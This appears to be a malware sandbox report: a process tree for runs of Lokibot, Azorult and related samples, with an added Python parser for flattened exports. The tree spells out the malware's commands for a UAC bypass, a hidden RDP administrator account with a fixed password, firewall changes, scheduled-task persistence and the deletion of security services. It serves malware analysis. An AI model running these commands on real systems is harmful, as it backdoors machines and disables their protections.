C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4772 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3904
-
[depth 2 | PID 4676] C:\Windows\System32\msiexec.exe
  cmd: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\BabylonClient12.msi"
  - Blocklisted process makes network request
  - Enumerates connected drives
[depth 2 | PID 5012] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3320 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 756] C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  cmd: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\metrofax.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  [depth 3 | PID 6060] C:\Windows\splwow64.exe
    cmd: C:\Windows\splwow64.exe 12288
[depth 2 | PID 472] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5900 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 5836] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3112 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 5972] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4332 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 1096] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3320 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 5744] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2848 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 5884] C:\Users\Admin\Downloads\Lokibot.exe
  cmd: "C:\Users\Admin\Downloads\Lokibot.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  [depth 3 | PID 4684] C:\Users\Admin\Downloads\Lokibot.exe
    cmd: "C:\Users\Admin\Downloads\Lokibot.exe"
[depth 2 | PID 3312] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5604 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 5924] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4876 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 5760] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 4884] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5904 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 1196] C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3304 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2 | PID 1580] C:\Users\Admin\Downloads\Azorult.exe
  cmd: "C:\Users\Admin\Downloads\Azorult.exe"
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Checks computer location settings
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - System policy modification
  [depth 3 | PID 3112] C:\ProgramData\Microsoft\Intel\wini.exe
    cmd: C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    [depth 4 | PID 5728] C:\Windows\SysWOW64\WScript.exe
      cmd: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      - Checks computer location settings
      [depth 5 | PID 4420] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        [depth 6 | PID 4424] C:\Windows\SysWOW64\regedit.exe
          cmd: regedit /s "reg1.reg"
          - UAC bypass
          - Windows security bypass
          - Runs .reg file with regedit
        [depth 6 | PID 4216] C:\Windows\SysWOW64\regedit.exe
          cmd: regedit /s "reg2.reg"
          - Runs .reg file with regedit
        [depth 6 | PID 444] C:\Windows\SysWOW64\timeout.exe
          cmd: timeout 2
          - Delays execution with timeout.exe
        [depth 6 | PID 3316] C:\ProgramData\Windows\rutserv.exe
          cmd: rutserv.exe /silentinstall
          - Executes dropped EXE
        [depth 6 | PID 5924] C:\ProgramData\Windows\rutserv.exe
          cmd: rutserv.exe /firewall
          - Executes dropped EXE
        [depth 6 | PID 4476] C:\ProgramData\Windows\rutserv.exe
          cmd: rutserv.exe /start
          - Executes dropped EXE
        [depth 6 | PID 4884] C:\Windows\SysWOW64\attrib.exe
          cmd: ATTRIB +H +S C:\Programdata\Windows\*.*
          - Views/modifies file attributes
        [depth 6 | PID 4588] C:\Windows\SysWOW64\attrib.exe
          cmd: ATTRIB +H +S C:\Programdata\Windows
          - Views/modifies file attributes
        [depth 6 | PID 2288] C:\Windows\SysWOW64\sc.exe
          cmd: sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
          - Launches sc.exe
        [depth 6 | PID 1896] C:\Windows\SysWOW64\sc.exe
          cmd: sc config RManService obj= LocalSystem type= interact type= own
          - Launches sc.exe
        [depth 6 | PID 5420] C:\Windows\SysWOW64\sc.exe
          cmd: sc config RManService DisplayName= "Microsoft Framework"
          - Launches sc.exe
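Sandbox exports like this one often arrive flattened: the image path, the command line and the tree depth are run together on one line, terminated by a "⤵" glyph, with the indicator bullets and the PID on the lines after it. Because the depth digit is glued onto the command line ("timeout 26" is "timeout 2" at depth 6, "chcp 125110" is "chcp 1251" at depth 10), a naive split corrupts arguments. The parser below is an added example, not part of this report or of any sandbox vendor's tooling. It recovers image, command line, depth, PID, indicators and parent links from that shape, resolving the depth with the rule that a child can be at most one level deeper than the entry before it. Its two sample inputs are constructed from lines in this report (the Azorult chain above and the later net.exe/chcp lines); `max_first_depth` is this example's own knob for snippets that start mid-tree.

```python
"""Rebuild a process tree from a flattened sandbox listing.

Added example, not part of this report or of any sandbox vendor's code.
Assumed line shapes (the form in which exports like this one arrive):
'<image path><command line><depth>⤵[PID:<n>]' starts a process, '- <text>'
lines are its indicators, 'PID:<n> -' closes it and a bare '-' separates
entries. The depth is glued to the command line ('timeout 26' is
'timeout 2' at depth 6); a child is at most one level deeper than the
entry before it, which makes that split unambiguous for depths 2..11.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

ARROW = "\u2935"  # the '⤵' glyph that ends every process line
ENTRY_RE = re.compile(
    r"^(?P<image>[A-Za-z]:\\.*?\.(?:exe|com))(?P<rest>.*?)" + ARROW
    + r"(?:PID:(?P<pid>\d+))?$", re.IGNORECASE)


@dataclass
class Proc:
    image: str
    cmdline: str
    depth: int
    pid: Optional[int] = None
    indicators: List[str] = field(default_factory=list)
    parent: Optional["Proc"] = field(default=None, repr=False)
    children: List["Proc"] = field(default_factory=list, repr=False)


def split_depth(rest: str, lo: int, hi: int):
    """Peel the depth off '<command line><depth>': try the last two digits
    (depths 10/11) and then the last one, keeping the first in [lo, hi]."""
    digits = re.search(r"\d+$", rest)
    if not digits:
        raise ValueError(f"no depth suffix in {rest!r}")
    tail = digits.group(0)
    for width in (2, 1):
        if len(tail) >= width and tail[-width] != "0":
            cand = int(tail[-width:])
            if lo <= cand <= hi:
                return cand, rest[:-width].strip()
    raise ValueError(f"no plausible depth in {rest!r} (allowed {lo}..{hi})")


def parse(text: str, max_first_depth: int = 9) -> List[Proc]:
    """max_first_depth bounds the first entry of a snippet that starts
    mid-tree, where no previous entry anchors its depth."""
    procs: List[Proc] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        m = ENTRY_RE.match(line)
        if m:
            lo, hi = (2, procs[-1].depth + 1) if procs else (1, max_first_depth)
            depth, cmdline = split_depth(m["rest"], lo, hi)
            pid = int(m["pid"]) if m["pid"] else None
            procs.append(Proc(m["image"], cmdline, depth, pid))
        elif line.startswith("PID:") and procs:
            procs[-1].pid = int(line[4:].split()[0])
        elif line.startswith("- ") and procs:
            procs[-1].indicators.append(line[2:].strip())
        else:
            raise ValueError(f"unrecognised line: {line!r}")
    link_parents(procs)
    return procs


def link_parents(procs: List[Proc]) -> None:
    """Parent = the most recent entry exactly one level shallower."""
    last_at: Dict[int, Proc] = {}
    for p in procs:
        p.parent = last_at.get(p.depth - 1)
        if p.parent is not None:
            p.parent.children.append(p)
        for d in [d for d in last_at if d >= p.depth]:
            del last_at[d]  # deeper entries can no longer be parents
        last_at[p.depth] = p


def ancestry(p: Proc) -> List[str]:
    """Image file names from the shallowest known ancestor down to p."""
    chain: List[str] = []
    cur: Optional[Proc] = p
    while cur is not None:
        chain.append(cur.image.rsplit("\\", 1)[-1])
        cur = cur.parent
    return chain[::-1]


# Constructed input: lines copied verbatim from the Azorult chain in this report.
SAMPLE = r'''
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
PID:1580 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Executes dropped EXE
PID:3112 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- Checks computer location settings
PID:5728 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵PID:4420
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Runs .reg file with regedit
PID:4424 -
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
PID:444 -
'''

# Constructed input from the RDP-account part of the report: the trailing
# '10'/'11' of 'add10', 'add11' and 'chcp 125110' are depths, not arguments.
SAMPLE_DEEP = r'''
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵PID:644
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵PID:2336
C:\Windows\SysWOW64\chcp.comchcp 125110⤵PID:2816
'''
```

The depth rule has one blind spot: a command line that genuinely ends in "10" or "11" at depth 10 or 11 cannot be told apart from the glued depth; for everything else the previous entry's depth pins the split down. Keeping `image` separate from `cmdline` is deliberate, since the WOW64 redirection visible above (image `C:\Windows\SysWOW64\WScript.exe`, command line `C:\Windows\System32\WScript.exe`) tells you the dropper is a 32-bit process.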
    [depth 4 | PID 5840] C:\ProgramData\Windows\winit.exe
      cmd: "C:\ProgramData\Windows\winit.exe"
      - Executes dropped EXE
      - Checks processor information in registry
      - Modifies registry class
      [depth 5 | PID 2364] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        [depth 6 | PID 5632] C:\Windows\SysWOW64\timeout.exe
          cmd: timeout 5
          - Delays execution with timeout.exe
  [depth 3 | PID 1628] C:\programdata\install\cheat.exe
    cmd: C:\programdata\install\cheat.exe -pnaxui
    - Checks computer location settings
    [depth 4 | PID 3040] C:\ProgramData\Microsoft\Intel\taskhost.exe
      cmd: "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      - Checks computer location settings
      [depth 5 | PID 648] C:\programdata\microsoft\intel\P.exe
        cmd: C:\programdata\microsoft\intel\P.exe
      [depth 5 | PID 1104] C:\programdata\microsoft\intel\R8.exe
        cmd: C:\programdata\microsoft\intel\R8.exe
        - Checks computer location settings
        - Modifies registry class
        [depth 6 | PID 472] C:\Windows\SysWOW64\WScript.exe
          cmd: "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
          - Checks computer location settings
          [depth 7 | PID 2376] C:\Windows\SysWOW64\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
            - Checks computer location settings
            [depth 8 | PID 4588] C:\Windows\System32\Conhost.exe
              cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            [depth 8 | PID 2100] C:\Windows\SysWOW64\taskkill.exe
              cmd: taskkill /f /im Rar.exe
              - Kills process with taskkill
            [depth 8 | PID 3472] C:\Windows\SysWOW64\taskkill.exe
              cmd: taskkill /f /im Rar.exe
              - Kills process with taskkill
            [depth 8 | PID 2940] C:\Windows\SysWOW64\timeout.exe
              cmd: timeout 3
              - Delays execution with timeout.exe
            [depth 8 | PID 4472] C:\Windows\SysWOW64\chcp.com
              cmd: chcp 1251
            [depth 8 | PID 3356] C:\rdp\Rar.exe
              cmd: "Rar.exe" e -p555 db.rar
            [depth 8 | PID 2816] C:\Windows\SysWOW64\taskkill.exe
              cmd: taskkill /f /im Rar.exe
              - Kills process with taskkill
            [depth 8 | PID 1396] C:\Windows\SysWOW64\timeout.exe
              cmd: timeout 2
              - Delays execution with timeout.exe
            [depth 8 | PID 5880] C:\Windows\SysWOW64\WScript.exe
              cmd: "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
              - Checks computer location settings
              [depth 9 | PID 2888] C:\Windows\SysWOW64\cmd.exe
                cmd: C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                [depth 10 | PID 4556] C:\Windows\SysWOW64\reg.exe
                  cmd: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                [depth 10 | PID 5292] C:\Windows\SysWOW64\reg.exe
                  cmd: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                [depth 10 | PID 3952] C:\Windows\SysWOW64\netsh.exe
                  cmd: netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                  - Modifies Windows Firewall
                [depth 10 | PID 644] C:\Windows\SysWOW64\net.exe
                  cmd: net.exe user "john" "12345" /add
                  [depth 11 | PID 2336] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 user "john" "12345" /add
                [depth 10 | PID 2816] C:\Windows\SysWOW64\chcp.com
                  cmd: chcp 1251
                [depth 10 | PID 8] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Администраторы" "John" /add
                  [depth 11 | PID 3408] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                [depth 10 | PID 5124] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Administratorzy" "John" /add
                  [depth 11 | PID 5900] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                [depth 10 | PID 1416] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Administrators" John /add
                  [depth 11 | PID 1576] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Administrators" John /add
                [depth 10 | PID 4976] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Administradores" John /add
                  [depth 11 | PID 1048] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Administradores" John /add
                [depth 10 | PID 1424] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Пользователи удаленного рабочего стола" John /add
                  [depth 11 | PID 2516] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                [depth 10 | PID 4284] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Пользователи удаленного управления" John /add
                  [depth 11 | PID 5328] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                [depth 10 | PID 2988] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Remote Desktop Users" John /add
                  [depth 11 | PID 2220] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                [depth 10 | PID 4560] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Usuarios de escritorio remoto" John /add
                  [depth 11 | PID 3004] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                [depth 10 | PID 1284] C:\Windows\SysWOW64\net.exe
                  cmd: net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                  [depth 11 | PID 1572] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                [depth 10 | PID 5388] C:\rdp\RDPWInst.exe
                  cmd: "RDPWInst.exe" -i -o
                  - Sets DLL path for service in the registry
                  - Modifies WinLogon
                  - Drops file in System32 directory
                  - Drops file in Program Files directory
                  [depth 11 | PID 6620] C:\Windows\SYSTEM32\netsh.exe
                    cmd: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                    - Modifies Windows Firewall
                [depth 10 | PID 6676] C:\rdp\RDPWInst.exe
                  cmd: "RDPWInst.exe" -w
                [depth 10 | PID 6804] C:\Windows\SysWOW64\reg.exe
                  cmd: reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                [depth 10 | PID 6824] C:\Windows\SysWOW64\net.exe
                  cmd: net accounts /maxpwage:unlimited
                  [depth 11 | PID 6840] C:\Windows\SysWOW64\net1.exe
                    cmd: C:\Windows\system32\net1 accounts /maxpwage:unlimited
                [depth 10 | PID 6856] C:\Windows\SysWOW64\attrib.exe
                  cmd: attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                  - Sets file to hidden
                  - Drops file in Program Files directory
                  - Views/modifies file attributes
                [depth 10 | PID 6872] C:\Windows\SysWOW64\attrib.exe
                  cmd: attrib +s +h "C:\Program Files\RDP Wrapper"
                  - Sets file to hidden
                  - Drops file in Program Files directory
                  - Views/modifies file attributes
                [depth 10 | PID 6888] C:\Windows\SysWOW64\attrib.exe
                  cmd: attrib +s +h "C:\rdp"
                  - Sets file to hidden
                  - Views/modifies file attributes
            [depth 8 | PID 1264] C:\Windows\SysWOW64\timeout.exe
              cmd: timeout 2
              - Delays execution with timeout.exe
      [depth 5 | PID 3144] C:\ProgramData\Microsoft\Intel\winlog.exe
        cmd: C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        - Checks computer location settings
        [depth 6 | PID 2888] C:\ProgramData\Microsoft\Intel\winlogon.exe
          cmd: "C:\ProgramData\Microsoft\Intel\winlogon.exe"
          - Checks computer location settings
          [depth 7 | PID 5544] C:\Windows\system32\cmd.exe
            cmd: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FFB3.tmp\FFB4.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
            [depth 8 | PID 4220] C:\Windows\System32\Conhost.exe
              cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            [depth 8 | PID 5108] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              cmd: PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
              - Drops file in System32 directory
              - Command and Scripting Interpreter: PowerShell
      [depth 5 | PID 5124] C:\Programdata\RealtekHD\taskhostw.exe
        cmd: C:\Programdata\RealtekHD\taskhostw.exe
        - Modifies visibility of hidden/system files in Explorer
        - Adds Run key to start application
        - NTFS ADS
        - Suspicious behavior: GetForegroundWindowSpam
        [depth 6 | PID 1572] C:\Programdata\WindowsTask\winlogon.exe
          cmd: C:\Programdata\WindowsTask\winlogon.exe
          [depth 7 | PID 5940] C:\Windows\SysWOW64\cmd.exe
            cmd: C:\Windows\system32\cmd.exe /C schtasks /query /fo list
            [depth 8 | PID 2016] C:\Windows\SysWOW64\schtasks.exe
              cmd: schtasks /query /fo list
        [depth 6 | PID 6740] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c ipconfig /flushdns
          [depth 7 | PID 6792] C:\Windows\system32\ipconfig.exe
            cmd: ipconfig /flushdns
            - Gathers network information
        [depth 6 | PID 6916] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c gpupdate /force
          [depth 7 | PID 6968] C:\Windows\system32\gpupdate.exe
            cmd: gpupdate /force
      [depth 5 | PID 4132] C:\Windows\SysWOW64\schtasks.exe
        cmd: "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        - Creates scheduled task(s)
      [depth 5 | PID 2968] C:\Windows\SysWOW64\schtasks.exe
        cmd: "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        - Creates scheduled task(s)
      [depth 5 | PID 644] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        - Drops file in Drivers directory
      [depth 5 | PID 6520] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        [depth 6 | PID 6592] C:\Windows\SysWOW64\timeout.exe
          cmd: TIMEOUT /T 5 /NOBREAK
          - Delays execution with timeout.exe
        [depth 6 | PID 2016] C:\Windows\SysWOW64\timeout.exe
          cmd: TIMEOUT /T 3 /NOBREAK
          - Delays execution with timeout.exe
        [depth 6 | PID 5280] C:\Windows\SysWOW64\taskkill.exe
          cmd: TASKKILL /IM 1.exe /T /F
          - Kills process with taskkill
        [depth 6 | PID 6576] C:\Windows\SysWOW64\taskkill.exe
          cmd: TASKKILL /IM P.exe /T /F
          - Kills process with taskkill
        [depth 6 | PID 1820] C:\Windows\SysWOW64\attrib.exe
          cmd: ATTRIB +H +S C:\Programdata\Windows
          - Views/modifies file attributes
  [depth 3 | PID 3960] C:\programdata\install\ink.exe
    cmd: C:\programdata\install\ink.exe
  [depth 3 | PID 3904] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc start appidsvc
    [depth 4 | PID 5352] C:\Windows\SysWOW64\sc.exe
      cmd: sc start appidsvc
      - Launches sc.exe
  [depth 3 | PID 5356] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc start appmgmt
    [depth 4 | PID 644] C:\Windows\SysWOW64\sc.exe
      cmd: sc start appmgmt
      - Launches sc.exe
  [depth 3 | PID 4680] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    [depth 4 | PID 1312] C:\Windows\SysWOW64\sc.exe
      cmd: sc config appidsvc start= auto
      - Launches sc.exe
  [depth 3 | PID 1716] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    [depth 4 | PID 5896] C:\Windows\SysWOW64\sc.exe
      cmd: sc config appmgmt start= auto
      - Launches sc.exe
  [depth 3 | PID 1196] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete swprv
    [depth 4 | PID 1936] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete swprv
      - Launches sc.exe
  [depth 3 | PID 4420] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc stop mbamservice
    [depth 4 | PID 3304] C:\Windows\SysWOW64\sc.exe
      cmd: sc stop mbamservice
      - Launches sc.exe
  [depth 3 | PID 2904] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    [depth 4 | PID 2132] C:\Windows\SysWOW64\sc.exe
      cmd: sc stop bytefenceservice
      - Launches sc.exe
  [depth 3 | PID 5284] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    [depth 4 | PID 4808] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete bytefenceservice
      - Launches sc.exe
  [depth 3 | PID 4024] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete mbamservice
    [depth 4 | PID 5312] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete mbamservice
      - Launches sc.exe
  [depth 3 | PID 5260] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete crmsvc
    [depth 4 | PID 4856] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete crmsvc
      - Launches sc.exe
  [depth 3 | PID 5152] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete "windows node"
    [depth 4 | PID 6116] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete "windows node"
      - Launches sc.exe
  [depth 3 | PID 5648] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    [depth 4 | PID 4188] C:\Windows\SysWOW64\sc.exe
      cmd: sc stop Adobeflashplayer
      - Launches sc.exe
  [depth 3 | PID 5728] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    [depth 4 | PID 1576] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete AdobeFlashPlayer
      - Launches sc.exe
  [depth 3 | PID 3416] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    [depth 4 | PID 5572] C:\Windows\SysWOW64\sc.exe
      cmd: sc stop MoonTitle
      - Launches sc.exe
  [depth 3 | PID 6076] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    [depth 4 | PID 3312] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete MoonTitle"
      - Launches sc.exe
  [depth 3 | PID 1396] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc stop AudioServer
    [depth 4 | PID 5644] C:\Windows\SysWOW64\sc.exe
      cmd: sc stop AudioServer
      - Launches sc.exe
  [depth 3 | PID 6100] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    [depth 4 | PID 1716] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete AudioServer"
      - Launches sc.exe
  [depth 3 | PID 4720] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    [depth 4 | PID 4588] C:\Windows\SysWOW64\sc.exe
      cmd: sc stop clr_optimization_v4.0.30318_64
      - Launches sc.exe
  [depth 3 | PID 3472] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    [depth 4 | PID 5408] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete clr_optimization_v4.0.30318_64"
      - Launches sc.exe
  [depth 3 | PID 3952] C:\Windows\SysWOW64\cmd.exe
